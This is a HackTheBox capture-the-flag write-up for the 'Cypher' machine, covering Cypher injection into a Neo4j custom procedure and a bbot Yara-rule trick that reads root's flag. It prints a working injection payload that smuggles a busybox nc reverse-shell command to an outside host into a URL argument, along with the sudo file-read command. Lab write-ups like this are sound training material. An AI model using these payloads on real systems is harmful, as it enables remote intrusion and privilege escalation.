All write-ups
5 min read

HackTheBox: Cypher Writeup

HackTheBoxLinuxCypher InjectionNeo4jYaraPrivilege Escalation

HackTheBox: Cypher

Overview

Cypher is a Linux-based machine that focuses on exploiting a Neo4j graph database via Cypher Injection and escalating privileges by manipulating Yara rule executions through the bbot binary. This writeup documents the path from initial access to system compromise.

Initial Access: Cypher Injection

The target application features a login page backed by a Neo4j graph database. Neo4j uses the Cypher query language, which is susceptible to injection attacks similar to traditional SQL injections.

By analyzing the application (and decompiling an associated JAR file using cfr), a custom stored procedure is discovered.

Decompiling the Custom Extension

Extracting the compiled JAR reveals the underlying logic:

java -jar cfr-0.152.jar custom-apoc-extension-1.0-SNAPSHOT.jar --outputdir java_cypher

Inside the customFunctions class, a stored procedure is defined that allows executing system commands. A crafted payload can trigger this procedure to establish a reverse shell.

The Payload

The injection payload utilizes the custom.getUrlStatusCode function, embedding a busybox reverse shell:

a' return h.value as a UNION CALL custom.getUrlStatusCode("http://10.10.11.57:80;busybox nc 10.10.14.242 4444 -e sh;#") YIELD statusCode AS a RETURN a;//

To submit this via Burp Suite in a POST request, the JSON payload must be properly escaped. Once sent to the /api/cypher endpoint (or the login form), the reverse shell connects back.

Lateral Movement

Exploring the file system as the graphasm user yields the user flag.

graphasm@cypher:~$ cat user.txt
[REDACTED]

Privilege Escalation: Bbot and Yara Rules

Checking for sudo privileges reveals that graphasm can run the bbot binary without a password:

graphasm@cypher:~$ sudo -l
Matching Defaults entries for graphasm on cypher:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User graphasm may run the following commands on cypher:
    (ALL) NOPASSWD: /usr/local/bin/bbot

bbot (Blacklantern Security Bot) is an OSINT automation tool that supports executing Yara rules to scan files. By inspecting its help menu (sudo /usr/local/bin/bbot --help), we can leverage the -cy (custom yara rules) flag to read sensitive files.

By passing /root/root.txt as a custom Yara rule file and enabling debug output, the contents of the file are printed in the error/debug logs, as it attempts to parse the flag as a Yara rule.

sudo /usr/local/bin/bbot -cy /root/root.txt -d --dry-run

Output:

[DBUG] internal.excavate: Successfully loaded custom yara rules file [/root/root.txt]
[DBUG] internal.excavate: Final combined yara rule contents: [REDACTED]

Root compromise achieved.

Notes & Techniques